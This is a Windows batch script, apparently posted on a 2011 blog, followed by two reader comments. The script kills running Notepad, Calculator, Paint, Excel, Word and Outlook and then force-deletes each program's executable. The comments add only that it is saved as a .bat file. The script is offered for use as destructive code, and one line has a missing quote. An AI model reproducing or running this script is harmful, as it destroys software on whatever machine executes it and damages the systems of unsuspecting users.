rem ---------------------------------
rem Delete Notepad
tskill notepad
del /f /q "%windir%\system32\notepad.exe"
rem ---------------------------------
rem ---------------------------------
rem Delete Calculator
tskill calc
del /f /q "%windir%\system32\calc.exe
rem ---------------------------------
rem ---------------------------------
rem Delete Paint
tskill mspaint
del /f /q "%windir%\system32\mspaint.exe"
rem ---------------------------------
rem ---------------------------------
rem Delete Excel
tskill excel
del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE"
rem ---------------------------------
rem ---------------------------------
rem Delete Word
tskill WINWORD
del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\WINWORD.EXE"
rem ---------------------------------
rem ---------------------------------
rem Delete Outlook
tskill outlook
del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\OUTLOOK.EXE"
rem ---------------------------------
Prashant Rajvind
November 19, 2011 at 12:44 AM
what wil b the file extnsn for tht typ of files...
Surbhi Verma
November 19, 2011 at 6:33 PM
.bat